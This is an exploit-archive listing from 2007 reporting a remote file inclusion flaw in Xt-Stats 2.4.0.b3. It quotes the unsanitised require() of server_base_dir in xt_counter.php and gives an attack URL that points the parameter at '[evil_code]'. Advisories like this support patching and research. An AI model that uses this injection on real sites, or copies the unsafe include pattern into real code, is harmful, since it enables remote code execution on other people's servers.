[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability
# Published : 2007-01-27
# Author : ThE dE@Th
# Previous Title : ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability
# Next Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
Download:http://www.xt-scripts.com/index.php?dl=32
**************************************************
Finded by ThE dE@Th
*******************
Greetz For :AsB-May Team & HaCk.eGy
***********************************
xt_counter.php:
*************
require( $server_base_dir.'management/sources/counter_class.php');
http://www.site.com/[path]/xt_counter.php?server_base_dir=[evil_code]
*************************************************************
# www.Syue.com [2007-01-27]